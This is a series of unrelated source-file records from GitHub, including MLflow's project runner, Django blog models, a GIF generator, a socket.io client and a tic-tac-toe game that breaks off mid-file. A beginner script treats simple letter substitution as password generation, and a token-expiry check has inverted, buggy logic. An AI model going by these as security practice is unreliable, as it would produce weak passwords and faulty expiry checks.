MLflow will default to running\n# \"conda\" if unset\nMLFLOW_CONDA_HOME = \"MLFLOW_CONDA_HOME\"\n\n\ndef _run(uri, entry_point=\"main\", version=None, parameters=None, experiment_id=None,\n mode=None, cluster_spec=None, git_username=None, git_password=None, use_conda=True,\n storage_dir=None, block=True, run_id=None):\n \"\"\"\n Helper that delegates to the project-running method corresponding to the passed-in mode.\n Returns a ``SubmittedRun`` corresponding to the project run.\n \"\"\"\n exp_id = experiment_id or _get_experiment_id()\n parameters = parameters or {}\n work_dir = _fetch_project(uri=uri, force_tempdir=False, version=version,\n git_username=git_username, git_password=git_password)\n project = _project_spec.load_project(work_dir)\n project.get_entry_point(entry_point)._validate_parameters(parameters)\n if run_id:\n active_run = tracking.get_service().get_run(run_id)\n else:\n active_run = _create_run(uri, exp_id, work_dir, entry_point, parameters)\n\n if mode == \"databricks\":\n from mlflow.projects.databricks import run_databricks\n return run_databricks(\n remote_run=active_run,\n uri=uri, entry_point=entry_point, work_dir=work_dir, parameters=parameters,\n experiment_id=exp_id, cluster_spec=cluster_spec)\n elif mode == \"local\" or mode is None:\n # Synchronously create a conda environment (even though this may take some time) to avoid\n # failures due to multiple concurrent attempts to create the same conda env.\n conda_env_name = _get_or_create_conda_env(project.conda_env_path) if use_conda else None\n # In blocking mode, run the entry point command in blocking fashion, sending status updates\n # to the tracking server when finished. Note that the run state may not be persisted to the\n # tracking server if interrupted\n if block:\n command = _get_entry_point_command(\n project, entry_point, parameters, conda_env_name, storage_dir)\n return _run_entry_point(command, work_dir, exp_id, run_id=active_run.info.run_uuid)\n # Otherwise, invoke `mlflow run` in a subprocess\n return _invoke_mlflow_run_subprocess(\n work_dir=work_dir, entry_point=entry_point, parameters=parameters, experiment_id=exp_id,\n use_conda=use_conda, storage_dir=storage_dir, run_id=active_run.info.run_uuid)\n supported_modes = [\"local\", \"databricks\"]\n raise ExecutionException(\"Got unsupported execution mode %s. Supported \"\n \"values: %s\" % (mode, supported_modes))\n\n\ndef run(uri, entry_point=\"main\", version=None, parameters=None, experiment_id=None,\n mode=None, cluster_spec=None, git_username=None, git_password=None, use_conda=True,\n storage_dir=None, block=True, run_id=None):\n \"\"\"\n Run an MLflow project from the given URI.\n\n Supports downloading projects from Git URIs with a specified version, or copying them from\n the file system. For Git-based projects, a commit can be specified as the ``version``.\n\n :raises ``ExecutionException``: If a run launched in blocking mode is unsuccessful.\n\n :param uri: URI of project to run. Expected to be either a relative/absolute local filesystem\n path or a git repository URI (e.g. https://github.com/mlflow/mlflow-example)\n pointing to a project directory containing an MLproject file.\n :param entry_point: Entry point to run within the project. 
If no entry point with the specified\n name is found, attempts to run the project file ``entry_point`` as a script,\n using \"python\" to run .py files and the default shell (specified by\n environment variable $SHELL) to run .sh files.\n :param experiment_id: ID of experiment under which to launch the run.\n :param mode: Execution mode for the run. Can be set to \"local\" or \"databricks\".\n :param cluster_spec: Path to JSON file describing the cluster to use when launching a run on\n Databricks.\n :param git_username: Username for HTTP(S) authentication with Git.\n :param git_password: Password for HTTP(S) authentication with Git.\n :param use_conda: If True (the default), creates a new Conda environment for the run and\n installs project dependencies within that environment. Otherwise, runs the\n project in the current environment without installing any project\n dependencies.\n :param storage_dir: Only used if ``mode`` is local. MLflow will download artifacts from\n distributed URIs passed to parameters of type 'path' to subdirectories of\n ``storage_dir``.\n :param block: Whether or not to block while waiting for a run to complete. Defaults to True.\n Note that if ``block`` is False and mode is \"local\", this method will return, but\n the current process will block when exiting until the local run completes.\n If the current process is interrupted, any asynchronous runs launched via this\n method will be terminated.\n :param run_id: Note: this argument is used internally by the MLflow project APIs and should\n not be specified. If specified, the given run ID will be used instead of\n creating a new run.\n :return: A ``SubmittedRun`` exposing information (e.g. run ID) about the launched run. The\n returned ``SubmittedRun`` is not thread-safe.\n \"\"\"\n submitted_run_obj = _run(\n uri=uri, entry_point=entry_point, version=version, parameters=parameters,\n experiment_id=experiment_id, mode=mode, cluster_spec=cluster_spec,\n git_username=git_username, git_password=git_password, use_conda=use_conda,\n storage_dir=storage_dir, block=block, run_id=run_id)\n if block:\n _wait_for(submitted_run_obj)\n return submitted_run_obj\n\n\ndef _wait_for(submitted_run_obj):\n \"\"\"Wait on the passed-in submitted run, reporting its status to the tracking server.\"\"\"\n run_id = submitted_run_obj.run_id\n active_run = None\n # Note: there's a small chance we fail to report the run's status to the tracking server if\n # we're interrupted before we reach the try block below\n try:\n active_run = tracking.get_service().get_run(run_id) if run_id is not None else None\n if submitted_run_obj.wait():\n eprint(\"=== Run (ID '%s') succeeded ===\" % run_id)\n _maybe_set_run_terminated(active_run, \"FINISHED\")\n else:\n _maybe_set_run_terminated(active_run, \"FAILED\")\n raise ExecutionException(\"=== Run (ID '%s') failed ===\" % run_id)\n except KeyboardInterrupt:\n eprint(\"=== Run (ID '%s') === interrupted, cancelling run ===\" % run_id)\n submitted_run_obj.cancel()\n _maybe_set_run_terminated(active_run, \"FAILED\")\n raise\n\n\ndef _parse_subdirectory(uri):\n # Parses a uri and returns the uri and subdirectory as separate values.\n # Uses '#' as a delimiter.\n subdirectory = ''\n parsed_uri = uri\n if '#' in uri:\n subdirectory = uri[uri.find('#')+1:]\n parsed_uri = uri[:uri.find('#')]\n if subdirectory and '.' in subdirectory:\n raise ExecutionException(\"'.' 
is not allowed in project subdirectory paths.\")\n return parsed_uri, subdirectory\n\n\ndef _get_storage_dir(storage_dir):\n if storage_dir is not None and not os.path.exists(storage_dir):\n os.makedirs(storage_dir)\n return tempfile.mkdtemp(dir=storage_dir)\n\n\ndef _expand_uri(uri):\n if _is_local_uri(uri):\n return os.path.abspath(uri)\n return uri\n\n\ndef _is_local_uri(uri):\n \"\"\"Returns True if the passed-in URI should be interpreted as a path on the local filesystem.\"\"\"\n return not _GIT_URI_REGEX.match(uri)\n\n\ndef _fetch_project(uri, force_tempdir, version=None, git_username=None, git_password=None):\n \"\"\"\n Fetch a project into a local directory, returning the path to the local project directory.\n :param force_tempdir: If True, will fetch the project into a temporary directory. Otherwise,\n will fetch Git projects into a temporary directory but simply return the\n path of local projects (i.e. perform a no-op for local projects).\n \"\"\"\n parsed_uri, subdirectory = _parse_subdirectory(uri)\n use_temp_dst_dir = force_tempdir or not _is_local_uri(parsed_uri)\n dst_dir = tempfile.mkdtemp() if use_temp_dst_dir else parsed_uri\n if use_temp_dst_dir:\n eprint(\"=== Fetching project from %s into %s ===\" % (uri, dst_dir))\n if _is_local_uri(uri):\n if version is not None:\n raise ExecutionException(\"Setting a version is only supported for Git project URIs\")\n if use_temp_dst_dir:\n dir_util.copy_tree(src=parsed_uri, dst=dst_dir)\n else:\n assert _GIT_URI_REGEX.match(parsed_uri), \"Non-local URI %s should be a Git URI\" % parsed_uri\n _fetch_git_repo(parsed_uri, version, dst_dir, git_username, git_password)\n res = os.path.abspath(os.path.join(dst_dir, subdirectory))\n if not os.path.exists(res):\n raise ExecutionException(\"Could not find subdirectory %s of %s\" % (subdirectory, dst_dir))\n return res\n\n\ndef _fetch_git_repo(uri, version, dst_dir, git_username, git_password):\n \"\"\"\n Clone the git repo at ``uri`` into ``dst_dir``, checking out commit ``version`` (or defaulting\n to the head commit of the repository's master branch if version is unspecified).\n If ``git_username`` and ``git_password`` are specified, uses them to authenticate while fetching\n the repo. Otherwise, assumes authentication parameters are specified by the environment,\n e.g. 
by a Git credential helper.\n \"\"\"\n # We defer importing git until the last moment, because the import requires that the git\n # executable is availble on the PATH, so we only want to fail if we actually need it.\n import git\n repo = git.Repo.init(dst_dir)\n origin = repo.create_remote(\"origin\", uri)\n git_args = [git_username, git_password]\n if not (all(arg is not None for arg in git_args) or all(arg is None for arg in git_args)):\n raise ExecutionException(\"Either both or neither of git_username and git_password must be \"\n \"specified.\")\n if git_username:\n git_credentials = \"url=%s\\nusername=%s\\npassword=%s\" % (uri, git_username, git_password)\n repo.git.config(\"--local\", \"credential.helper\", \"cache\")\n process.exec_cmd(cmd=[\"git\", \"credential-cache\", \"store\"], cwd=dst_dir,\n cmd_stdin=git_credentials)\n origin.fetch()\n if version is not None:\n repo.git.checkout(version)\n else:\n repo.create_head(\"master\", origin.refs.master)\n repo.heads.master.checkout()\n\n\ndef _get_conda_env_name(conda_env_path):\n conda_env_contents = open(conda_env_path).read() if conda_env_path else \"\"\n return \"mlflow-%s\" % hashlib.sha1(conda_env_contents.encode(\"utf-8\")).hexdigest()\n\n\ndef _get_conda_bin_executable(executable_name):\n \"\"\"\n Return path to the specified executable, assumed to be discoverable within the 'bin'\n subdirectory of a conda installation.\n\n The conda home directory (expected to contain a 'bin' subdirectory) is configurable via the\n ``mlflow.projects.MLFLOW_CONDA_HOME`` environment variable. If\n ``mlflow.projects.MLFLOW_CONDA_HOME`` is unspecified, this method simply returns the passed-in\n executable name.\n \"\"\"\n conda_home = os.environ.get(MLFLOW_CONDA_HOME)\n if conda_home:\n return os.path.join(conda_home, \"bin/%s\" % executable_name)\n return executable_name\n\n\ndef _get_or_create_conda_env(conda_env_path):\n \"\"\"\n Given a `Project`, creates a conda environment containing the project's dependencies if such a\n conda environment doesn't already exist. Returns the name of the conda environment.\n \"\"\"\n conda_path = _get_conda_bin_executable(\"conda\")\n try:\n process.exec_cmd([conda_path, \"--help\"], throw_on_error=False)\n except EnvironmentError:\n raise ExecutionException(\"Could not find Conda executable at {0}. \"\n \"Ensure Conda is installed as per the instructions \"\n \"at https://conda.io/docs/user-guide/install/index.html. You can \"\n \"also configure MLflow to look for a specific Conda executable \"\n \"by setting the {1} environment variable to the path of the Conda \"\n \"executable\".format(conda_path, MLFLOW_CONDA_HOME))\n (_, stdout, _) = process.exec_cmd([conda_path, \"env\", \"list\", \"--json\"])\n env_names = [os.path.basename(env) for env in json.loads(stdout)['envs']]\n project_env_name = _get_conda_env_name(conda_env_path)\n if project_env_name not in env_names:\n eprint('=== Creating conda environment %s ===' % project_env_name)\n if conda_env_path:\n process.exec_cmd([conda_path, \"env\", \"create\", \"-n\", project_env_name, \"--file\",\n conda_env_path], stream_output=True)\n else:\n process.exec_cmd(\n [conda_path, \"create\", \"-n\", project_env_name, \"python\"], stream_output=True)\n return project_env_name\n\n\ndef _maybe_set_run_terminated(active_run, status):\n \"\"\"\n If the passed-in active run is defined and still running (i.e. 
hasn't already been terminated\n within user code), mark it as terminated with the passed-in status.\n \"\"\"\n if active_run is None:\n return\n run_id = active_run.info.run_uuid\n cur_status = tracking.get_service().get_run(run_id).info.status\n if RunStatus.is_terminated(cur_status):\n return\n tracking.get_service().set_terminated(run_id, status)\n\n\ndef _get_entry_point_command(project, entry_point, parameters, conda_env_name, storage_dir):\n \"\"\"\n Returns the shell command to execute in order to run the specified entry point.\n :param project: Project containing the target entry point\n :param entry_point: Entry point to run\n :param parameters: Parameters (dictionary) for the entry point command\n :param conda_env_name: Name of conda environment to use for command execution, or None if no\n conda environment should be used.\n :param storage_dir: Base local directory to use for downloading remote artifacts passed to\n arguments of type 'path'. If None, a temporary base directory is used.\n \"\"\"\n storage_dir_for_run = _get_storage_dir(storage_dir)\n eprint(\"=== Created directory %s for downloading remote URIs passed to arguments of \"\n \"type 'path' ===\" % storage_dir_for_run)\n commands = []\n if conda_env_name:\n activate_path = _get_conda_bin_executable(\"activate\")\n commands.append(\"source %s %s\" % (activate_path, conda_env_name))\n commands.append(\n project.get_entry_point(entry_point).compute_command(parameters, storage_dir_for_run))\n return \" && \".join(commands)\n\n\ndef _run_entry_point(command, work_dir, experiment_id, run_id):\n \"\"\"\n Run an entry point command in a subprocess, returning a SubmittedRun that can be used to\n query the run's status.\n :param command: Entry point command to run\n :param work_dir: Working directory in which to run the command\n :param run_id: MLflow run ID associated with the entry point execution.\n \"\"\"\n env = os.environ.copy()\n env.update(_get_run_env_vars(run_id, experiment_id))\n eprint(\"=== Running command '%s' in run with ID '%s' === \" % (command, run_id))\n process = subprocess.Popen([\"bash\", \"-c\", command], close_fds=True, cwd=work_dir, env=env)\n return LocalSubmittedRun(run_id, process)\n\n\ndef _build_mlflow_run_cmd(\n uri, entry_point, storage_dir, use_conda, run_id, parameters):\n \"\"\"\n Build and return an array containing an ``mlflow run`` command that can be invoked to locally\n run the project at the specified URI.\n \"\"\"\n mlflow_run_arr = [\"mlflow\", \"run\", uri, \"-e\", entry_point, \"--run-id\", run_id]\n if storage_dir is not None:\n mlflow_run_arr.extend([\"--storage-dir\", storage_dir])\n if not use_conda:\n mlflow_run_arr.append(\"--no-conda\")\n for key, value in parameters.items():\n mlflow_run_arr.extend([\"-P\", \"%s=%s\" % (key, value)])\n return mlflow_run_arr\n\n\ndef _run_mlflow_run_cmd(mlflow_run_arr, env_map):\n \"\"\"\n Invoke ``mlflow run`` in a subprocess, which in turn runs the entry point in a child process.\n Returns a handle to the subprocess. 
Popen launched to invoke ``mlflow run``.\n \"\"\"\n final_env = os.environ.copy()\n final_env.update(env_map)\n # Launch `mlflow run` command as the leader of its own process group so that we can do a\n # best-effort cleanup of all its descendant processes if needed\n return subprocess.Popen(\n mlflow_run_arr, env=final_env, universal_newlines=True, preexec_fn=os.setsid)\n\n\ndef _create_run(uri, experiment_id, work_dir, entry_point, parameters):\n \"\"\"\n Create a ``Run`` against the current MLflow tracking server, logging metadata (e.g. the URI,\n entry point, and parameters of the project) about the run. Return an ``ActiveRun`` that can be\n used to report additional data about the run (metrics/params) to the tracking server.\n \"\"\"\n if _is_local_uri(uri):\n source_name = tracking.utils._get_git_url_if_present(_expand_uri(uri))\n else:\n source_name = _expand_uri(uri)\n active_run = tracking.get_service().create_run(\n experiment_id=experiment_id,\n source_name=source_name,\n source_version=_get_git_commit(work_dir),\n entry_point_name=entry_point,\n source_type=SourceType.PROJECT)\n if parameters is not None:\n for key, value in parameters.items():\n tracking.get_service().log_param(active_run.info.run_uuid, key, value)\n return active_run\n\n\ndef _get_run_env_vars(run_id, experiment_id):\n \"\"\"\n Returns a dictionary of environment variable key-value pairs to set in subprocess launched\n to run MLflow projects.\n \"\"\"\n return {\n tracking._RUN_ID_ENV_VAR: run_id,\n tracking._TRACKING_URI_ENV_VAR: tracking.get_tracking_uri(),\n tracking._EXPERIMENT_ID_ENV_VAR: str(experiment_id),\n }\n\n\ndef _invoke_mlflow_run_subprocess(\n work_dir, entry_point, parameters, experiment_id, use_conda, storage_dir, run_id):\n \"\"\"\n Run an MLflow project asynchronously by invoking ``mlflow run`` in a subprocess, returning\n a SubmittedRun that can be used to query run status.\n \"\"\"\n eprint(\"=== Asynchronously launching MLflow run with ID %s ===\" % run_id)\n mlflow_run_arr = _build_mlflow_run_cmd(\n uri=work_dir, entry_point=entry_point, storage_dir=storage_dir, use_conda=use_conda,\n run_id=run_id, parameters=parameters)\n mlflow_run_subprocess = _run_mlflow_run_cmd(\n mlflow_run_arr, _get_run_env_vars(run_id, experiment_id))\n return LocalSubmittedRun(run_id, mlflow_run_subprocess)\n","repo_name":"rstudio/mlflow-original","sub_path":"mlflow/projects/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19966,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"42024075235","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\n\nUser = get_user_model()\n\nLENGTH_TEXT = 15\n\n\nclass Group(models.Model):\n title = models.CharField(max_length=200)\n slug = models.SlugField(max_length=50, unique=True)\n description = models.TextField()\n\n def __str__(self) -> str:\n return self.title\n\n\nclass Post(models.Model):\n text = models.TextField(\n 'Текст поста',\n help_text='Введите текст поста'\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='author',\n related_name='posts'\n )\n pub_date = models.DateTimeField(\n auto_now_add=True,\n verbose_name='publish date',\n db_index=True\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True,\n null=True,\n verbose_name='group',\n help_text='Группа, к которой будет относиться пост'\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n 
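The mlflow record above centers on the public `run()` API, whose docstring documents the URI, entry-point, mode, and conda arguments. A hedged invocation sketch using the example repository named in that docstring; the `alpha` parameter is illustrative and must match the target project's MLproject file:

import mlflow.projects

# Launch the example project's "main" entry point locally, blocking until done.
submitted = mlflow.projects.run(
    uri='https://github.com/mlflow/mlflow-example',  # URI from the docstring above
    entry_point='main',
    parameters={'alpha': 0.4},  # illustrative; defined by the project's MLproject
    use_conda=True,
    block=True,
)
print(submitted.run_id)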
blank=True\n    )\n\n    class Meta:\n        ordering = ('-pub_date',)\n        verbose_name = 'post'\n        verbose_name_plural = 'posts'\n\n    def __str__(self):\n        return self.text[:LENGTH_TEXT]\n\n\nclass Comment(models.Model):\n    post = models.ForeignKey(\n        Post,\n        on_delete=models.CASCADE,\n        related_name='comments',\n        verbose_name='post',\n    )\n    author = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='comments',\n        verbose_name='author',\n    )\n    text = models.TextField(\n        'Текст поста',\n        help_text='Введите текст поста'\n    )\n    created = models.DateTimeField(\n        auto_now_add=True,\n        verbose_name='дата публикации',\n        db_index=True\n    )\n\n    class Meta:\n        verbose_name = 'comment'\n        verbose_name_plural = 'comments'\n        ordering = ('-created',)\n\n    def __str__(self):\n        return self.text[:LENGTH_TEXT]\n\n\nclass Follow(models.Model):\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='follower',\n        verbose_name='follower',\n    )\n    author = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='following',\n        verbose_name='author',\n    )\n\n    class Meta:\n        verbose_name = 'following'\n        verbose_name_plural = 'followings'\n        ordering = ('author',)\n        constraints = (\n            models.UniqueConstraint(\n                fields=('user', 'author'),\n                name='user_author_constraints',\n            ),\n            models.CheckConstraint(\n                check=~models.Q(user=models.F('author')),\n                name='user_author_unique'\n            ),\n        )\n","repo_name":"skiba-py/yatube","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30796970186","text":"import json\nfrom fastapi import APIRouter, Cookie, Depends, HTTPException, Query, Request, Response, File, UploadFile, Form\nfrom models.runtime import Runtime\nfrom utils.motor import L\nruntime_route = APIRouter(\n    prefix=\"/runtime\",\n    tags=[\"runtime | 运行环境\"],\n)\n\n@runtime_route.get('/')\nasync def get_runtime_list():\n    runtime_list = await L(Runtime.objects.as_pymongo())\n    return {\n        'data': runtime_list,\n    }\n\n","repo_name":"VegeMarket/irori_judger","sub_path":"routers/v2/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70429125","text":"'''\r\n# the password needs:\r\n# uppercase and lowercase letters\r\n# symbols and spaces\r\n\r\n# the password will have a base key, for example:\r\n# Security = base\r\n# 5ecur1ty = password\r\n'''\r\nchave = input('Digite a base da sua senha: ')\r\n\r\nsenha = ''\r\n\r\nfor letra in chave:\r\n    if letra in \"Aa\": \r\n        senha += '3'\r\n    elif letra in \"Dd\":\r\n        senha += '7'\r\n    elif letra in \"Ss\":\r\n        senha += '2'\r\n    elif letra in \"Vv\":\r\n        senha += 'ç'\r\n    elif letra in \"Oo\":\r\n        senha += '6'\r\n    else:\r\n        senha += letra\r\n\r\nprint(senha)\r\n","repo_name":"vitor001/Python","sub_path":"Gerador de senha.py","file_name":"Gerador de senha.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43806057672","text":"import distutils.command.clean\nimport glob\nimport os\nimport shutil\nimport subprocess\nfrom typing import Dict, Union, List\n\nfrom setuptools import setup, find_namespace_packages\n\n# Package name\npackage_name = \"distcp_playground\"\n\n# Version information\ncwd: str = os.path.dirname(os.path.abspath(__file__))\nversion_txt: str = os.path.join(cwd, 
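The Follow model above pairs a UniqueConstraint (no duplicate follows) with a CheckConstraint built from `~Q(user=F('author'))` (no self-follows), so both rules are enforced by the database rather than by view code. A sketch of what that buys in a test, assuming the usual Django test setup and that `posts.models` is the import path (hypothetical):

from django.db import IntegrityError
from django.test import TestCase

from posts.models import Follow, User  # hypothetical import path

class FollowConstraintTest(TestCase):
    def test_self_follow_rejected_by_database(self):
        user = User.objects.create_user(username='leo')
        # The CheckConstraint fires at INSERT time, before any app-level validation.
        with self.assertRaises(IntegrityError):
            Follow.objects.create(user=user, author=user)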
\"version.txt\")\nwith open(version_txt, \"r\") as f:\n version: str = f.readline().strip()\n\ntry:\n sha: str = (\n subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"], cwd=cwd)\n .decode(\"ascii\")\n .strip()\n )\nexcept Exception:\n sha = \"Unknown\"\n\nif os.getenv(\"BUILD_VERSION\"):\n version = os.getenv(\"BUILD_VERSION\", version)\nelif sha != \"Unknown\":\n version += \"+\" + sha[:7]\n\n\ndef write_version_file() -> None:\n version_path = os.path.join(cwd, \"distcp_playground\", \"version.py\")\n with open(version_path, \"w\") as f:\n f.write(\"__version__ = '{}'\\n\".format(version))\n f.write(\"git_version = {}\\n\".format(repr(sha)))\n\n\n# Package requirements\nrequirements = [\n # This represents a nightly version of PyTorch.\n # It can be installed as a binary or from source.\n \"torch>=1.12.0.dev\"\n]\n\nclass clean(distutils.command.clean.clean): # type: ignore\n def run(self) -> None:\n\n with open(\".gitignore\", \"r\") as f:\n ignores = f.read()\n for wildcard in filter(None, ignores.split(\"\\n\")):\n for filename in glob.glob(wildcard):\n try:\n os.remove(filename)\n except OSError:\n shutil.rmtree(filename, ignore_errors=True)\n\n # It's an old-style class in Python 2.7...\n distutils.command.clean.clean.run(self) # type: ignore\n\n\nif __name__ == \"__main__\":\n write_version_file()\n\n setup(\n # Metadata\n name=package_name,\n version=version,\n author=\"Rodrigo Kumpera\",\n url=\"https://https://github.com/kumpera/distcp-playground\",\n description=\"PyTorch Distributed checkpoint random basket of prototypes\",\n license=\"MIT\",\n # Package info\n packages=find_namespace_packages(),\n install_requires=requirements,\n # extras_require=extras,\n cmdclass={\"clean\": clean},\n )\n","repo_name":"kumpera/distcp-playground","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29114060462","text":"import time\ndef fmt_time(time_string): #返回时间元组和时间戳\n stamp = str(time.mktime(time.strptime(time_string,\"%Y%m%d%H%M%S\")))\n return stamp\n\ndef token_is_valid(token_create_time):#检查TOKEN是否已经过时的函数\n ts1 = fmt_time(token_create_time)\n #print(str(ts1))\n ts2 = fmt_time(get_time_string())\n #print(str(ts2))\n if 0 < float(ts1) - float(ts2) < 3600 :\n return True\n else :\n return False\n\ndef get_time_string():#这是一个获取当前时间字符串格式的函数(精确到秒\n localtime = time.localtime(time.time())\n if localtime[1] <= 10:#格式化月份\n mon = '0' + str(localtime[1])\n else:\n mon = str(localtime[1])\n if localtime[2] <= 10:#天\n day = '0' + str(localtime[2])\n else:\n day = str(localtime[2])\n if localtime[3] <= 10:#小时\n hour = '0' + str(localtime[3])\n else:\n hour = str(localtime[3])\n if localtime[4] <= 10:#分钟\n min = '0' + str(localtime[4])\n else:\n min = str(localtime[4])\n if localtime[5] <= 10:#秒\n sec = '0' + str(localtime[5])\n else:\n sec = str(localtime[5])\n time_entity = str(localtime[0])+mon+day+hour+min+sec\n return time_entity\n\nprint(token_is_valid('20200426180000'))","repo_name":"DCZYewen/OpenOLS","sub_path":"Test_Folder/Token_Test.py","file_name":"Token_Test.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"28187320401","text":"from PIL import Image, ImageDraw, ImageFont\nimport random\n\ncolor = (\n random.randint(0, 255),\n random.randint(0, 255),\n random.randint(0, 255)\n)\n\nccolor = (\n max(color) + min(color) - color[0],\n 
max(color) + min(color) - color[1],\n max(color) + min(color) - color[2]\n)\n\nFZDBSJWFont = ImageFont.truetype('FZDBSJW.TTF', 180)\niml = Image.new('RGB', (300, 300), color)\nimr = Image.new('RGB', (300, 300), ccolor)\n\nframes = []\n\nimg = Image.new('RGB', (600, 300))\nimg.paste(imr, (300, 0))\nimg.paste(iml, (0, 0))\ntext = ImageDraw.Draw(img)\ntext.text((60, 55), \"色\", font=FZDBSJWFont, fill=ccolor)\ntext.text((365, 55), \"图\", font=FZDBSJWFont, fill=color)\nframes.append(img)\n\nimg = Image.new('RGB', (600, 300))\nimg.paste(iml, (300, 0))\nimg.paste(imr, (0, 0))\ntext = ImageDraw.Draw(img)\ntext.text((60, 55), \"色\", font=FZDBSJWFont, fill=color)\ntext.text((365, 55), \"图\", font=FZDBSJWFont, fill=ccolor)\nframes.append(img)\n\nframes[0].save(\"test.gif\", format='GIF', append_images=frames[1:], save_all=True, duration=100, loop=0) ","repo_name":"djkcyl/Random-dynamic-colormap-generation","sub_path":"Random dynamic color map generation.py","file_name":"Random dynamic color map generation.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"14404228458","text":"import socketio\nimport asyncio\nimport time\n\nsio = socketio.AsyncClient()\n\n# CREATE EVENT HANDLERS\n@sio.on('event_name')\nasync def event_handler_function():\n print(\"event happened\")\n\n# CALL EVENTS\nasync def call_event_function():\n await sio.emit('event_name', data)\n\n# EXAMPLE\n@sio.on('pingmebaby')\nasync def event_name():\n print(\"ping!\")\n\nasync def ping():\n await sio.emit('pingmebaby')\n\n# MAIN PROCESS FUNCTION\nasync def main_process():\n while True:\n await asyncio.sleep(10)\n await ping()\n\n# DEFAULT EVENTS AND SETUP\n@sio.event\ndef connect():\n print(\"I'm connected!\")\n\n@sio.event\ndef connect_error():\n print(\"The connection failed!\")\n\n@sio.event\ndef disconnect():\n print(\"I'm disconnected!\")\n\nasync def connect_to_server():\n await sio.connect('http://localhost:8080') # Connect to local server\n # await sio.connect('https://backend.healthmonitor.dev') # Connect to cloud server\n await sio.wait()\n\nasync def background_process():\n # Wait until connection is established\n while not sio.sid:\n print(\"Connecting...\")\n await asyncio.sleep(1)\n\n # Run main process\n await main_process()\n\nasync def main():\n await asyncio.gather(\n connect_to_server(),\n background_process(),\n )\n\nasyncio.run(main())","repo_name":"connorsparling/HealthMonitorUnit","sub_path":"PythonSocket/pysocket.py","file_name":"pysocket.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26760019851","text":"import os\n\n# Intilize a list for the board with empty strings\n# Note: we create a list with 10 slots, but we discard the first slot so we have a 9 slots board\nboard = [' ' for _ in range(10)]\n\ndef insert_letter(letter, pos):\n \"\"\"\n Function in charge to assign the letter X or O to its right position on the board.\n \"\"\"\n board[int(pos)] = letter\n\ndef is_space_free(pos):\n \"\"\"\n Function that checks if a position of the board is empty or used.\n \"\"\"\n return board[int(pos)] == ' '\n\ndef is_board_full(board):\n \"\"\"\n Function that checks if the the board positions are empty of full.\n \"\"\"\n return not board.count(' ') > 1\n\ndef winner_check(board, letter):\n \"\"\"\n Function that checks if the given letter has completed a line.\n \"\"\"\n return (\n # Horizontal check\n 
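The GIF record above derives its second color per channel as `max(color) + min(color) - c`, i.e. each channel reflected around the midpoint of the brightest and darkest channels. A worked check of that arithmetic:

color = (10, 200, 50)
s = max(color) + min(color)             # 200 + 10 = 210
complement = tuple(s - c for c in color)
assert complement == (200, 10, 160)     # each channel reflected around 105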
(board[1] == letter and board[2] == letter and board[3] == letter) or\n (board[4] == letter and board[5] == letter and board[6] == letter) or\n (board[7] == letter and board[8] == letter and board[9] == letter) or\n # Vertical check\n (board[1] == letter and board[4] == letter and board[7] == letter) or\n (board[2] == letter and board[5] == letter and board[8] == letter) or\n (board[3] == letter and board[6] == letter and board[9] == letter) or\n # Diagonal\n (board[1] == letter and board[5] == letter and board[9] == letter) or\n (board[3] == letter and board[5] == letter and board[7] == letter)\n )\n\ndef draw_board(board):\n \"\"\"\n Function that draw the board acording to user input.\n \"\"\"\n return f\"\"\"\n | | \n {board[1]} | {board[2]} | {board[3]} \n | | \n -----------\n | | \n {board[4]} | {board[5]} | {board[6]} \n | | \n -----------\n | | \n {board[7]} | {board[8]} | {board[9]} \n | | \n \"\"\"\n\ndef player_move():\n \"\"\"\n Function that checks wheter the player made a good move or not.\n \"\"\"\n while True:\n try:\n position = input(\"Select a position to place an 'X' (1-9): \")\n if int(position) >= 1 and int(position) <= 9:\n if is_space_free(position):\n insert_letter('X', position)\n # If the letter is succesfully inserted\n # Exit the player move function so the machine\n break\n else:\n print('Oops, this space is already ocupied.')\n else:\n raise ValueError\n except ValueError:\n print('Make sure you entered a valid number between 1 to 9')\n\ndef select_random(li):\n import random\n ln = len(li)\n r = random.randrange(0, ln)\n return li[r]\n\ndef computer_move():\n \"\"\"\n \n \"\"\"\n possible_moves = [x for x, letter in enumerate(board) if letter == ' ' and x != 0]\n move = 0\n\n for let in ['O', 'X']:\n for i in possible_moves:\n board_copy = board[:]\n board_copy[i] = let\n if winner_check(board_copy, let):\n move = i\n return move\n \n corners_open = list()\n for i in possible_moves:\n if i in [1, 3, 7, 9]:\n corners_open.append(i)\n \n if len(corners_open) > 0:\n move = select_random(corners_open)\n return move\n \n if 5 in possible_moves:\n move = 5\n return move\n \n edges_open = list()\n for i in possible_moves:\n if i in [2, 4, 6, 8]:\n edges_open.append(i)\n \n if len(edges_open) > 0:\n move = select_random(edges_open)\n return move\n \n return move\n\n\ndef main():\n os.system('clear')\n print('Welcome to the Tic 